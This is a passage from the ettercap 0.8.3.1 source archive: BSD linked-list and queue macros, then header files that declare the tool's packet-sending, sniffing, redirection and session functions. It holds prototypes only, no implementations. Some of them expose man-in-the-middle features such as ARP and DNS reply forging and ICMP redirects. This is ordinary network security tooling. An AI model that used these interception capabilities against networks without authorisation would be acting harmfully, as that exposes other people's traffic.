list should use the explicit * macro for this purpose for optimum efficiency. A singly-linked list may * only be traversed in the forward direction. Singly-linked lists are ideal * for applications with large datasets and few or no removals or for * implementing a LIFO queue. * * A list is headed by a single forward pointer (or an array of forward * pointers for a hash table header). The elements are doubly linked * so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before * or after an existing element or at the head of the list. A list * may only be traversed in the forward direction. * * A simple queue is headed by a pair of pointers, one the head of the * list and the other to the tail of the list. The elements are singly * linked to save space, so elements can only be removed from the * head of the list. New elements can be added to the list before or after * an existing element, at the head of the list, or at the end of the * list. A simple queue may only be traversed in the forward direction. * * A tail queue is headed by a pair of pointers, one to the head of the * list and the other to the tail of the list. The elements are doubly * linked so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before or * after an existing element, at the head of the list, or at the end of * the list. A tail queue may be traversed in either direction. * * For details on the use of these macros, see the queue(3) manual page. */ /* * Singly-linked List definitions. */ #define SLIST_HEAD(name, type) \ struct name { \ struct type *slh_first; /* first element */ \ } #define SLIST_HEAD_INITIALIZER(head) \ { NULL } #define SLIST_ENTRY(type) \ struct { \ struct type *sle_next; /* next element */ \ } /* * Singly-linked List access methods. */ #define SLIST_FIRST(head) ((head)->slh_first) #define SLIST_END(head) NULL #define SLIST_EMPTY(head) (SLIST_FIRST(head) == SLIST_END(head)) #define SLIST_NEXT(elm, field) ((elm)->field.sle_next) #define SLIST_FOREACH(var, head, field) \ for((var) = SLIST_FIRST(head); \ (var) != SLIST_END(head); \ (var) = SLIST_NEXT(var, field)) #define SLIST_FOREACH_SAFE(var, head, field, tvar) \ for ((var) = SLIST_FIRST((head)); \ (var) && ((tvar) = SLIST_NEXT((var), field), 1); \ (var) = (tvar)) /* * Singly-linked List functions. */ #define SLIST_INIT(head) { \ SLIST_FIRST(head) = SLIST_END(head); \ } #define SLIST_INSERT_AFTER(slistelm, elm, field) do { \ (elm)->field.sle_next = (slistelm)->field.sle_next; \ (slistelm)->field.sle_next = (elm); \ } while (0) #define SLIST_INSERT_HEAD(head, elm, field) do { \ (elm)->field.sle_next = (head)->slh_first; \ (head)->slh_first = (elm); \ } while (0) #define SLIST_REMOVE_HEAD(head, field) do { \ (head)->slh_first = (head)->slh_first->field.sle_next; \ } while (0) #define SLIST_REMOVE(head, elm, type, field) do { \ if ((head)->slh_first == (elm)) { \ SLIST_REMOVE_HEAD((head), field); \ } \ else { \ struct type *curelm = (head)->slh_first; \ while( curelm->field.sle_next != (elm) ) \ curelm = curelm->field.sle_next; \ curelm->field.sle_next = \ curelm->field.sle_next->field.sle_next; \ } \ } while (0) /* * List definitions. */ #define LIST_HEAD(name, type) \ struct name { \ struct type *lh_first; /* first element */ \ } #define LIST_HEAD_INITIALIZER(head) \ { NULL } #define LIST_ENTRY(type) \ struct { \ struct type *le_next; /* next element */ \ struct type **le_prev; /* address of previous next element */ \ } /* * List access methods */ #define LIST_FIRST(head) ((head)->lh_first) #define LIST_END(head) NULL #define LIST_EMPTY(head) (LIST_FIRST(head) == LIST_END(head)) #define LIST_NEXT(elm, field) ((elm)->field.le_next) #define LIST_FOREACH(var, head, field) \ for((var) = LIST_FIRST(head); \ (var)!= LIST_END(head); \ (var) = LIST_NEXT(var, field)) #define LIST_FOREACH_SAFE(var, head, field, tvar) \ for ((var) = LIST_FIRST((head)); \ (var) && ((tvar) = LIST_NEXT((var), field), 1); \ (var) = (tvar)) /* * List functions. */ #define LIST_INIT(head) do { \ LIST_FIRST(head) = LIST_END(head); \ } while (0) #define LIST_INSERT_AFTER(listelm, elm, field) do { \ if (((elm)->field.le_next = (listelm)->field.le_next) != NULL) \ (listelm)->field.le_next->field.le_prev = \ &(elm)->field.le_next; \ (listelm)->field.le_next = (elm); \ (elm)->field.le_prev = &(listelm)->field.le_next; \ } while (0) #define LIST_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.le_prev = (listelm)->field.le_prev; \ (elm)->field.le_next = (listelm); \ *(listelm)->field.le_prev = (elm); \ (listelm)->field.le_prev = &(elm)->field.le_next; \ } while (0) #define LIST_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.le_next = (head)->lh_first) != NULL) \ (head)->lh_first->field.le_prev = &(elm)->field.le_next;\ (head)->lh_first = (elm); \ (elm)->field.le_prev = &(head)->lh_first; \ } while (0) #define LIST_REMOVE(elm, field) do { \ if ((elm)->field.le_next != NULL) \ (elm)->field.le_next->field.le_prev = \ (elm)->field.le_prev; \ *(elm)->field.le_prev = (elm)->field.le_next; \ } while (0) #define LIST_REPLACE(elm, elm2, field) do { \ if (((elm2)->field.le_next = (elm)->field.le_next) != NULL) \ (elm2)->field.le_next->field.le_prev = \ &(elm2)->field.le_next; \ (elm2)->field.le_prev = (elm)->field.le_prev; \ *(elm2)->field.le_prev = (elm2); \ } while (0) /* * Simple queue definitions. */ #define STAILQ_HEAD(name, type) \ struct name { \ struct type *sqh_first; /* first element */ \ struct type **sqh_last; /* addr of last next element */ \ } #define STAILQ_HEAD_INITIALIZER(head) \ { NULL, &(head).sqh_first } #define STAILQ_ENTRY(type) \ struct { \ struct type *sqe_next; /* next element */ \ } /* * Simple queue access methods. */ #define STAILQ_FIRST(head) ((head)->sqh_first) #define STAILQ_END(head) NULL #define STAILQ_EMPTY(head) (STAILQ_FIRST(head) == STAILQ_END(head)) #define STAILQ_NEXT(elm, field) ((elm)->field.sqe_next) #define STAILQ_FOREACH(var, head, field) \ for((var) = STAILQ_FIRST(head); \ (var) != STAILQ_END(head); \ (var) = STAILQ_NEXT(var, field)) #define STAILQ_FOREACH_SAFE(var, head, field, tvar) \ for ((var) = STAILQ_FIRST((head)); \ (var) && ((tvar) = STAILQ_NEXT((var), field), 1); \ (var) = (tvar)) /* * Simple queue functions. */ #define STAILQ_INIT(head) do { \ (head)->sqh_first = NULL; \ (head)->sqh_last = &(head)->sqh_first; \ } while (0) #define STAILQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.sqe_next = (head)->sqh_first) == NULL) \ (head)->sqh_last = &(elm)->field.sqe_next; \ (head)->sqh_first = (elm); \ } while (0) #define STAILQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.sqe_next = NULL; \ *(head)->sqh_last = (elm); \ (head)->sqh_last = &(elm)->field.sqe_next; \ } while (0) #define STAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.sqe_next = (listelm)->field.sqe_next) == NULL)\ (head)->sqh_last = &(elm)->field.sqe_next; \ (listelm)->field.sqe_next = (elm); \ } while (0) #define STAILQ_REMOVE_HEAD(head, elm, field) do { \ if (((head)->sqh_first = (elm)->field.sqe_next) == NULL) \ (head)->sqh_last = &(head)->sqh_first; \ } while (0) /* * Tail queue definitions. */ #define TAILQ_HEAD(name, type) \ struct name { \ struct type *tqh_first; /* first element */ \ struct type **tqh_last; /* addr of last next element */ \ } #define TAILQ_HEAD_INITIALIZER(head) \ { NULL, &(head).tqh_first } #define TAILQ_ENTRY(type) \ struct { \ struct type *tqe_next; /* next element */ \ struct type **tqe_prev; /* address of previous next element */ \ } /* * tail queue access methods */ #define TAILQ_FIRST(head) ((head)->tqh_first) #define TAILQ_END(head) NULL #define TAILQ_NEXT(elm, field) ((elm)->field.tqe_next) #define TAILQ_LAST(head, headname) \ (*(((struct headname *)((head)->tqh_last))->tqh_last)) /* XXX */ #define TAILQ_PREV(elm, headname, field) \ (*(((struct headname *)((elm)->field.tqe_prev))->tqh_last)) #define TAILQ_EMPTY(head) \ (TAILQ_FIRST(head) == TAILQ_END(head)) #define TAILQ_FOREACH(var, head, field) \ for((var) = TAILQ_FIRST(head); \ (var) != TAILQ_END(head); \ (var) = TAILQ_NEXT(var, field)) #define TAILQ_FOREACH_SAFE(var, head, field, tvar) \ for ((var) = TAILQ_FIRST((head)); \ (var) && ((tvar) = TAILQ_NEXT((var), field), 1); \ (var) = (tvar)) #define TAILQ_FOREACH_REVERSE(var, head, field, headname) \ for((var) = TAILQ_LAST(head, headname); \ (var) != TAILQ_END(head); \ (var) = TAILQ_PREV(var, headname, field)) #define TAILQ_FOREACH_REVERSE_SAFE(var, head, field, headname, tvar) \ for ((var) = TAILQ_LAST((head), headname); \ (var) && ((tvar) = TAILQ_PREV((var), headname, field), 1); \ (var) = (tvar)) /* * Tail queue functions. */ #define TAILQ_INIT(head) do { \ (head)->tqh_first = NULL; \ (head)->tqh_last = &(head)->tqh_first; \ } while (0) #define TAILQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.tqe_next = (head)->tqh_first) != NULL) \ (head)->tqh_first->field.tqe_prev = \ &(elm)->field.tqe_next; \ else \ (head)->tqh_last = &(elm)->field.tqe_next; \ (head)->tqh_first = (elm); \ (elm)->field.tqe_prev = &(head)->tqh_first; \ } while (0) #define TAILQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.tqe_next = NULL; \ (elm)->field.tqe_prev = (head)->tqh_last; \ *(head)->tqh_last = (elm); \ (head)->tqh_last = &(elm)->field.tqe_next; \ } while (0) #define TAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.tqe_next = (listelm)->field.tqe_next) != NULL)\ (elm)->field.tqe_next->field.tqe_prev = \ &(elm)->field.tqe_next; \ else \ (head)->tqh_last = &(elm)->field.tqe_next; \ (listelm)->field.tqe_next = (elm); \ (elm)->field.tqe_prev = &(listelm)->field.tqe_next; \ } while (0) #define TAILQ_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.tqe_prev = (listelm)->field.tqe_prev; \ (elm)->field.tqe_next = (listelm); \ *(listelm)->field.tqe_prev = (elm); \ (listelm)->field.tqe_prev = &(elm)->field.tqe_next; \ } while (0) #define TAILQ_REMOVE(head, elm, field) do { \ if (((elm)->field.tqe_next) != NULL) \ (elm)->field.tqe_next->field.tqe_prev = \ (elm)->field.tqe_prev; \ else \ (head)->tqh_last = (elm)->field.tqe_prev; \ *(elm)->field.tqe_prev = (elm)->field.tqe_next; \ } while (0) #define TAILQ_REPLACE(head, elm, elm2, field) do { \ if (((elm2)->field.tqe_next = (elm)->field.tqe_next) != NULL) \ (elm2)->field.tqe_next->field.tqe_prev = \ &(elm2)->field.tqe_next; \ else \ (head)->tqh_last = &(elm2)->field.tqe_next; \ (elm2)->field.tqe_prev = (elm)->field.tqe_prev; \ *(elm2)->field.tqe_prev = (elm2); \ } while (0) #endif /* !_SYS_QUEUE_H_ */ ettercap-0.8.3.1/include/ec_redirect.h000664 000000 000000 00000002230 13711276346 017523 0ustar00rootroot000000 000000 #ifndef ETTERCAP_REDIRECT_H #define ETTERCAP_REDIRECT_H typedef enum { EC_REDIR_ACTION_INSERT, EC_REDIR_ACTION_REMOVE } ec_redir_act_t; typedef enum { EC_REDIR_PROTO_IPV4, EC_REDIR_PROTO_IPV6 } ec_redir_proto_t; struct redir_entry { char *name; ec_redir_proto_t proto; char *destination; u_int16 from_port; u_int16 to_port; u_int16 orig_nport; struct ip_addr dst_network; struct ip_addr dst_netmask; LIST_ENTRY(redir_entry) next; }; struct serv_entry { char *name; u_int16 from_port; u_int16 to_port; SLIST_ENTRY(serv_entry) next; }; /* proto */ EC_API_EXTERN int ec_redirect(ec_redir_act_t action, char *name, ec_redir_proto_t proto, const char *destination, u_int16 sport, u_int16 dport); EC_API_EXTERN int ec_walk_redirects(void (*func)(struct redir_entry*)); EC_API_EXTERN int ec_walk_redirect_services(void (*func)(struct serv_entry*)); EC_API_EXTERN int ec_redirect_lookup(struct packet_object *po); EC_API_EXTERN void ec_redirect_cleanup(void); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_resolv.h000664 000000 000000 00000002346 13711276346 017244 0ustar00rootroot000000 000000 #ifndef ETTERCAP_RESOLV_H #define ETTERCAP_RESOLV_H #include #ifdef HAVE_ARPA_NAMESER_H #include #ifndef OS_BSD_OPEN #include #endif #include #else #include #endif /* * glibc 2.1.x does not have new NG_GET* macros... * implement the hack here. */ #if !defined HAVE_NS_GET && !defined NS_GET16 /* functions */ #define NS_GET16 GETSHORT #define NS_GET32 GETLONG #define NS_PUT16 PUTSHORT #define NS_PUT32 PUTLONG /* constants */ #define NS_MAXDNAME MAXDNAME #define ns_c_in C_IN #define ns_r_noerror NOERROR #define ns_t_cname T_CNAME #define ns_t_ptr T_PTR #define ns_t_a T_A #define ns_t_mx T_MX #define ns_o_query QUERY #endif #define MAX_HOSTNAME_LEN 64 EC_API_EXTERN int host_iptoa(struct ip_addr *ip, char *name); /* used by ec_dns to insert passively sniffed dns answers */ EC_API_EXTERN void resolv_cache_insert_passive(struct ip_addr *ip, char *name); /* initialize and teardown name resolver threads */ EC_API_EXTERN void resolv_thread_init(void); EC_API_EXTERN void resolv_thread_fini(void); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_scan.h000664 000000 000000 00000000560 13711276346 016652 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SCAN_H #define ETTERCAP_SCAN_H EC_API_EXTERN void build_hosts_list(void); EC_API_EXTERN void del_hosts_list(void); EC_API_EXTERN void add_host(struct ip_addr *ip, u_int8 mac[MEDIA_ADDR_LEN], char *name); EC_API_EXTERN int scan_load_hosts(char *filename); EC_API_EXTERN int scan_save_hosts(char *filename); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_send.h000664 000000 000000 00000006014 13711276346 016657 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SEND_H #define ETTERCAP_SEND_H #include #include #include #include EC_API_EXTERN int send_to_L2(struct packet_object *po); EC_API_EXTERN int send_to_L3(struct packet_object *po); EC_API_EXTERN int send_to_bridge(struct packet_object *po); EC_API_EXTERN int send_to_iface(struct packet_object *po, struct iface_env *iface); EC_API_EXTERN int send_arp(u_char type, struct ip_addr *sip, u_int8 *smac, struct ip_addr *tip, u_int8 *tmac); EC_API_EXTERN int send_L2_icmp_echo(u_char type, struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac); EC_API_EXTERN int send_L3_icmp(u_char type, struct ip_addr *sip, struct ip_addr *tip); EC_API_EXTERN int send_L3_icmp_echo(struct ip_addr *src, struct ip_addr *tgt); EC_API_EXTERN int send_icmp_redir(u_char type, struct ip_addr *sip, struct ip_addr *gw, struct packet_object *po); EC_API_EXTERN int send_dhcp_reply(struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac, u_int8 *dhcp_hdr, u_int8 *options, size_t optlen); EC_API_EXTERN int send_dns_reply(struct iface_env *iface, u_int16 dport, struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac, u_int16 id, u_int8 *data, size_t datalen, u_int16 anws_rr, u_int16 auth_rr, u_int16 addi_rr); EC_API_EXTERN int send_mdns_reply(struct iface_env *iface, u_int16 dport, struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac, u_int16 id, u_int8 *data, size_t datalen, u_int16 anws_rr, u_int16 auth_rr, u_int16 addi_rr); EC_API_EXTERN int send_tcp(struct ip_addr *sip, struct ip_addr *tip, u_int16 sport, u_int16 dport, u_int32 seq, u_int32 ack, u_int8 flags, u_int8 *payload, size_t length); EC_API_EXTERN int send_udp(struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac, u_int16 sport, u_int16 dport, u_int8 *payload, size_t length); EC_API_EXTERN int send_tcp_ether(u_int8 *dmac, struct ip_addr *sip, struct ip_addr *tip, u_int16 sport, u_int16 dport, u_int32 seq, u_int32 ack, u_int8 flags); EC_API_EXTERN int send_L3_icmp_unreach(struct packet_object *po); #ifdef WITH_IPV6 EC_API_EXTERN int send_L3_icmp6_echo(struct ip_addr *sip, struct ip_addr *tip); EC_API_EXTERN int send_L2_icmp6_echo(struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac); EC_API_EXTERN int send_L2_icmp6_echo_opt(struct ip_addr *sip, struct ip_addr *tip, u_int8* o_data, u_int32 o_len, u_int8 *tmac); EC_API_EXTERN int send_L2_icmp6_nsol(struct ip_addr *sip, struct ip_addr *tip, struct ip_addr *tgt, u_int8 *macaddr, u_int8 *tmac); EC_API_EXTERN int send_L2_icmp6_nadv(struct ip_addr *sip, struct ip_addr *tip, u_int8 *macaddr, int router, u_int8 *tmac); #endif EC_API_EXTERN void capture_only_incoming(pcap_t *p, libnet_t *l); EC_API_EXTERN u_int8 MEDIA_BROADCAST[MEDIA_ADDR_LEN]; EC_API_EXTERN u_int8 ARP_BROADCAST[MEDIA_ADDR_LEN]; #define FUNC_BUILDER(func) libnet_ptag_t func(u_int8 *dst, u_int16 proto, libnet_t* l) #define FUNC_BUILDER_PTR(func) libnet_ptag_t (*func)(u_int8 *dst, u_int16 proto, libnet_t* l) EC_API_EXTERN void add_builder(u_int8 dlt, FUNC_BUILDER_PTR(builder)); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_services.h000664 000000 000000 00000000315 13711276346 017547 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SERVICES_H #define ETTERCAP_SERVICES_H EC_API_EXTERN int services_init(void); EC_API_EXTERN char * service_search(u_int32 serv, u_int8 proto); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_session.h000664 000000 000000 00000001362 13711276346 017412 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SESSION_H #define ETTERCAP_SESSION_H struct ec_session { void *ident; size_t ident_len; void *data; size_t data_len; int flag; /* misc. boolean flag */ /* Used to trace headers for injection */ struct ec_session *prev_session; int (*match)(void *id_sess, void *id); void (*free)(void *data, size_t data_len); }; EC_API_EXTERN void session_put(struct ec_session *s); EC_API_EXTERN int session_get(struct ec_session **s, void *ident, size_t ident_len); EC_API_EXTERN int session_del(void *ident, size_t ident_len); EC_API_EXTERN int session_get_and_del(struct ec_session **s, void *ident, size_t ident_len); EC_API_EXTERN void session_free(struct ec_session *s); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_session_tcp.h000664 000000 000000 00000000757 13711276346 020267 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SESSION_TCP_H #define ETTERCAP_SESSION_TCP_H /* Session data structure */ struct tcp_half_status { u_int32 last_seq; u_int32 last_ack; int32 seq_adj; u_char injectable; #define INJ_FIN 1 #define INJ_FWD 2 }; struct tcp_status { struct tcp_half_status way[2]; }; EC_API_EXTERN size_t tcp_create_ident(void **i, struct packet_object *po); EC_API_EXTERN int tcp_find_direction(void *ids, void *id); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_set.h000664 000000 000000 00000004032 13711276346 016517 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SET_H #define ETTERCAP_SET_H EC_API_EXTERN void set_mitm(char *mitm); EC_API_EXTERN void set_onlymitm(void); EC_API_EXTERN void set_broadcast(void); EC_API_EXTERN void set_iface_bridge(char *iface); EC_API_EXTERN void set_promisc(void); EC_API_EXTERN void set_reversed(void); EC_API_EXTERN void set_proto(char *arg); EC_API_EXTERN void set_plugin(char *name); EC_API_EXTERN void set_plugin_list(char *list); EC_API_EXTERN void set_iface(char *iface); EC_API_EXTERN void set_lifaces(void); EC_API_EXTERN void set_secondary(char *iface); EC_API_EXTERN void set_netmask(char *netmask); EC_API_EXTERN void set_address(char *address); EC_API_EXTERN void set_read_pcap(char *pcap_file); EC_API_EXTERN void set_write_pcap(char *pcap_file); EC_API_EXTERN void set_pcap_filter(char *filter); EC_API_EXTERN void set_filter(char *end, const char *filter); EC_API_EXTERN void set_loglevel_packet(char *arg); EC_API_EXTERN void set_loglevel_info(char *arg); EC_API_EXTERN void set_loglevel_true(char *arg); EC_API_EXTERN void set_compress(void); EC_API_EXTERN void opt_set_regex(char *regex); EC_API_EXTERN void set_quiet(void); EC_API_EXTERN void set_superquiet(void); EC_API_EXTERN void set_script(char *script); EC_API_EXTERN void set_silent(void); #ifdef WITH_IPV6 EC_API_EXTERN void set_ip6scan(void); #endif EC_API_EXTERN void set_unoffensive(void); EC_API_EXTERN void disable_sslmitm(void); EC_API_EXTERN void set_resolve(void); EC_API_EXTERN void set_load_hosts(char *file); EC_API_EXTERN void set_save_hosts(char *file); EC_API_EXTERN void opt_set_format(char *format); EC_API_EXTERN void set_ext_headers(void); EC_API_EXTERN void set_wifi_key(char *key); EC_API_EXTERN void set_conf_file(char *file); EC_API_EXTERN void set_ssl_cert(char *cert); EC_API_EXTERN void set_ssl_key(char *key); #ifdef HAVE_EC_LUA EC_API_EXTERN void set_lua_args(char *args); EC_API_EXTERN void set_lua_script(char *script); #endif EC_API_EXTERN void set_target_target1(char *target1); EC_API_EXTERN void set_target_target2(char *target2); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_signals.h000664 000000 000000 00000000211 13711276346 017357 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SIGNAL_H #define ETTERCAP_SIGNAL_H EC_API_EXTERN void signal_handler(void); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_sleep.h000664 000000 000000 00000000153 13711276346 017034 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SLEEP_H #define ETTERCAP_SLEEP_H EC_API_EXTERN void ec_usleep(unsigned int usecs); #endif ettercap-0.8.3.1/include/ec_sniff.h000664 000000 000000 00000002510 13711276346 017030 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SNIFF_H #define ETTERCAP_SNIFF_H #include struct sniffing_method { char type; /* the type of the sniffing method */ #define SM_UNIFIED 0 #define SM_BRIDGED 1 char active; /* true if the sniff was started */ void (*start)(void); void (*cleanup)(void); void (*check_forwarded)(struct packet_object *po); void (*set_forwardable)(struct packet_object *po); void (*forward)(struct packet_object *po); void (*interesting)(struct packet_object *po); /* this function set the PO_IGNORE flag */ }; /* exported functions */ /* forwarder (the struct is in ec_globals.h) */ struct target_env; EC_API_EXTERN void set_sniffing_method(struct sniffing_method *sm); EC_API_EXTERN void set_unified_sniff(void); EC_API_EXTERN void set_bridge_sniff(void); EC_API_EXTERN int compile_display_filter(void); EC_API_EXTERN int compile_target(char *string, struct target_env *target); EC_API_EXTERN void reset_display_filter(struct target_env *t); EC_API_EXTERN void del_ip_list(struct ip_addr *ip, struct target_env *t); EC_API_EXTERN int cmp_ip_list(struct ip_addr *ip, struct target_env *t); EC_API_EXTERN void add_ip_list(struct ip_addr *ip, struct target_env *t); EC_API_EXTERN void free_ip_list(struct target_env *t); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_sniff_bridge.h000664 000000 000000 00000000704 13711276346 020347 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SNIFF_BRIDGE_H #define ETTERCAP_SNIFF_BRIDGE_H #include /* exported functions */ EC_API_EXTERN void start_bridge_sniff(void); EC_API_EXTERN void stop_bridge_sniff(void); EC_API_EXTERN void forward_bridge_sniff(struct packet_object *po); EC_API_EXTERN void bridge_check_forwarded(struct packet_object *po); EC_API_EXTERN void bridge_set_forwardable(struct packet_object *po); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_sniff_unified.h000664 000000 000000 00000000663 13711276346 020542 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SNIFF_UNIFIED_H #define ETTERCAP_SNIFF_UNIFIED_H /* exported functions */ EC_API_EXTERN void start_unified_sniff(void); EC_API_EXTERN void stop_unified_sniff(void); EC_API_EXTERN void forward_unified_sniff(struct packet_object *po); EC_API_EXTERN void unified_check_forwarded(struct packet_object *po); EC_API_EXTERN void unified_set_forwardable(struct packet_object *po); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_socket.h000664 000000 000000 00000001077 13711276346 017222 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SOCKET_H #define ETTERCAP_SOCKET_H /* The never ending errno problems... */ #if defined(OS_WINDOWS) && !defined(OS_CYGWIN) #define GET_SOCK_ERRNO() WSAGetLastError() #else #define GET_SOCK_ERRNO() errno #endif EC_API_EXTERN int open_socket(const char *host, u_int16 port); EC_API_EXTERN int close_socket(int s); EC_API_EXTERN void set_blocking(int s, int set); EC_API_EXTERN int socket_send(int s, const u_char *payload, size_t size); EC_API_EXTERN int socket_recv(int s, u_char *payload, size_t size); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_sslwrap.h000664 000000 000000 00000000674 13711276346 017427 0ustar00rootroot000000 000000 #ifndef ETTERCAP_SSLWRAP_H #define ETTERCAP_SSLWRAP_H #include #include EC_API_EXTERN void sslw_dissect_add(char *name, u_int32 port, FUNC_DECODER_PTR(decoder), u_char status); EC_API_EXTERN void sslw_dissect_move(char *name, u_int16 port); EC_API_EXTERN EC_THREAD_FUNC(sslw_start); EC_API_EXTERN void ssl_wrap_init(void); #define SSL_DISABLED 0 #define SSL_ENABLED 1 #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_stats.h000664 000000 000000 00000003770 13711276346 017072 0ustar00rootroot000000 000000 #ifndef ETTERCAP_STATS_H #define ETTERCAP_STATS_H /* * this struct contains all field to collect * statistics about packet and byte rate * for the bottom and top half */ struct half_stats { uint64_t pck_recv; uint64_t pck_size; struct timeval ttot; struct timeval tpar; struct timeval ts; struct timeval te; uint64_t tmp_size; unsigned long rate_adv; unsigned long rate_worst; unsigned long thru_adv; unsigned long thru_worst; }; /* * global statistics: bottom and top half + queue */ struct gbl_stats { uint64_t ps_recv; uint64_t ps_recv_delta; uint64_t ps_drop; uint64_t ps_drop_delta; uint64_t ps_ifdrop; uint64_t ps_sent; uint64_t ps_sent_delta; uint64_t bs_sent; uint64_t bs_sent_delta; struct half_stats bh; struct half_stats th; unsigned long queue_max; unsigned long queue_curr; }; #define time_sub(a, b, result) do { \ (result)->tv_sec = (a)->tv_sec - (b)->tv_sec; \ (result)->tv_usec = (a)->tv_usec - (b)->tv_usec; \ if ((result)->tv_usec < 0) { \ --(result)->tv_sec; \ (result)->tv_usec += 1000000; \ } \ } while (0) #define time_add(a, b, result) do { \ (result)->tv_sec = (a)->tv_sec + (b)->tv_sec; \ (result)->tv_usec = (a)->tv_usec + (b)->tv_usec; \ if ((result)->tv_usec >= 1000000) { \ ++(result)->tv_sec; \ (result)->tv_usec -= 1000000; \ } \ } while (0) /* exports */ EC_API_EXTERN void stats_wipe(void); EC_API_EXTERN void stats_update(void); EC_API_EXTERN unsigned long stats_queue_add(void); EC_API_EXTERN unsigned long stats_queue_del(void); EC_API_EXTERN void stats_half_start(struct half_stats *hs); EC_API_EXTERN void stats_half_end(struct half_stats *hs, u_int len); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_stdint.h000664 000000 000000 00000003555 13711276346 017242 0ustar00rootroot000000 000000 #ifndef ETTERCAP_STDINT_H #define ETTERCAP_STDINT_H #include #if defined HAVE_STDINT_H && !defined OS_SOLARIS #include #elif !defined OS_SOLARIS #include #elif defined OS_SOLARIS #include #endif #if defined HAVE_INTTYPES_H #include #else /* HAVE_INTTYPES_H */ #if __WORDSIZE == 64 #define __PRI64_PREFIX "l" #else #define __PRI64_PREFIX "ll" #endif #ifndef PRId64 #define PRId64 __PRI64_PREFIX "d" #endif #ifndef PRIu64 #define PRIu64 __PRI64_PREFIX "u" #endif #endif /* HAVE_INTTYPES_H */ #ifndef TYPES_DEFINED #define TYPES_DEFINED typedef int8_t int8; typedef int16_t int16; typedef int32_t int32; typedef int64_t int64; typedef uint8_t u_int8; typedef uint16_t u_int16; typedef uint32_t u_int32; typedef uint64_t u_int64; typedef unsigned char u_char; #if defined OS_BSD_OPEN && !defined HAVE_STDINT_H #define INT8_MAX CHAR_MAX #define UINT8_MAX UCHAR_MAX #define INT16_MAX SHRT_MAX #define UINT16_MAX USHRT_MAX #define INT32_MAX INT_MAX #define UINT32_MAX UINT_MAX #endif /* Maximum of signed integral types. */ #ifndef INT8_MAX #define INT8_MAX (127) #endif #ifndef INT16_MAX #define INT16_MAX (32767) #endif #ifndef INT32_MAX #define INT32_MAX (2147483647) #endif /* Maximum of unsigned integral types. */ #ifndef UINT8_MAX #define UINT8_MAX (255) #endif #ifndef UINT16_MAX #define UINT16_MAX (65535) #endif #ifndef UINT32_MAX #define UINT32_MAX (4294967295U) #endif #endif /* min and max */ #ifndef MIN #define MIN(a, b) (((a) < (b)) ? (a) : (b)) #endif #ifndef MAX #define MAX(a, b) (((a) > (b)) ? (a) : (b)) #endif #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_streambuf.h000664 000000 000000 00000002342 13711276346 017716 0ustar00rootroot000000 000000 #ifndef ETTERCAP_STREAMBUF_H #define ETTERCAP_STREAMBUF_H #include struct stream_buf { /* the lock */ pthread_mutex_t streambuf_mutex; /* Last TCP Sequence Number if we are using it for TCP streaming */ u_int32 tcp_seq; /* total size */ size_t size; /* the real buffer made up of a tail of packets */ TAILQ_HEAD(streambuf_head, stream_pck_list) streambuf_tail; }; /* an entry in the tail */ struct stream_pck_list { /* size of the element */ size_t size; /* pointer to the last read byte */ size_t ptr; /* the data */ u_char *buf; /* the link to the next element */ TAILQ_ENTRY(stream_pck_list) next; }; /* functions */ EC_API_EXTERN void streambuf_init(struct stream_buf *sb); EC_API_EXTERN int streambuf_add(struct stream_buf *sb, struct packet_object *po); EC_API_EXTERN int streambuf_seq_add(struct stream_buf *sb, struct packet_object *po); EC_API_EXTERN int streambuf_get(struct stream_buf *sb, u_char *buf, size_t len, int mode); EC_API_EXTERN void streambuf_wipe(struct stream_buf *sb); EC_API_EXTERN int streambuf_read(struct stream_buf *sb, u_char *buf, size_t len, int mode); #define STREAM_ATOMIC 0 #define STREAM_PARTIAL 1 #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_strings.h000664 000000 000000 00000003242 13711276346 